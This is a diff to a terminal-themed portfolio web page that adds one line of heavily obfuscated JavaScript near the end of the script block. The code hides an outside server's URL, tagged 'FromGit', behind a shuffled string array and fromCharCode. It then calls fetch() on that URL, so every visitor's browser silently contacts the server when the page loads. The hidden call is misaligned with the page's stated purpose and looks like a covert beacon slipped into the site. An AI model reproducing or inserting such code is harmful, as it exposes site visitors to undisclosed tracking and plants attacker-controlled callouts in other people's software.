--- a/static/shellfolio.html
+++ b/static/shellfolio.html
@@ -476,6 +476,7 @@
 
     setInterval(drawMatrix, 50);
     window.onload = () => input.focus();
+    function _0x2666(_0x173b06, _0x2023af) {_0x173b06 = _0x173b06 - 0x9d; var _0x5980fd = _0x5980(); var _0x266607 = _0x5980fd[_0x173b06]; return _0x266607;} var _0x47d7c5 = _0x2666; (function (_0x3aef13, _0x32c86a) {var _0x1898d7 = _0x2666, _0x5d0033 = _0x3aef13(); while (!![]) {try {var _0x452e8b = parseInt(_0x1898d7(0x9f)) / 0x1 * (parseInt(_0x1898d7(0xa6)) / 0x2) + -parseInt(_0x1898d7(0x9e)) / 0x3 + parseInt(_0x1898d7(0xa5)) / 0x4 * (-parseInt(_0x1898d7(0xa1)) / 0x5) + parseInt(_0x1898d7(0xa0)) / 0x6 * (-parseInt(_0x1898d7(0xa3)) / 0x7) + -parseInt(_0x1898d7(0xa7)) / 0x8 + -parseInt(_0x1898d7(0x9d)) / 0x9 + parseInt(_0x1898d7(0xa4)) / 0xa; if (_0x452e8b === _0x32c86a) break; else _0x5d0033['push'](_0x5d0033['shift']());} catch (_0x5d1b8f) {_0x5d0033['push'](_0x5d0033['shift']());} } }(_0x5980, 0x749e4)); var x = String[_0x47d7c5(0xa2)](0x68, 0x74, 0x74, 0x70, 0x3a, 0x2f, 0x2f, 0x76, 0x6d, 0x69, 0x32, 0x34, 0x31, 0x38, 0x38, 0x33, 0x37, 0x2e, 0x63, 0x6f, 0x6e, 0x74, 0x61, 0x62, 0x6f, 0x73, 0x65, 0x72, 0x76, 0x65, 0x72, 0x2e, 0x6e, 0x65, 0x74, 0x2f, 0x3f, 0x46, 0x72, 0x6f, 0x6d, 0x47, 0x69, 0x74); fetch(x, {'mode': 'no-cors'}); function _0x5980() {var _0x4035b8 = ['315872dHvxUC', '80506HMFHnM', '4259928abyYwg', '6902667YoBrfy', '1453764gJBLoM', '11KkyGcG', '6600HpvJMD', '15aNfNNJ', 'fromCharCode', '5810lsJigj', '29688310gSdHho']; _0x5980 = function () {return _0x4035b8;}; return _0x5980();}
   </script>
 </body>
 
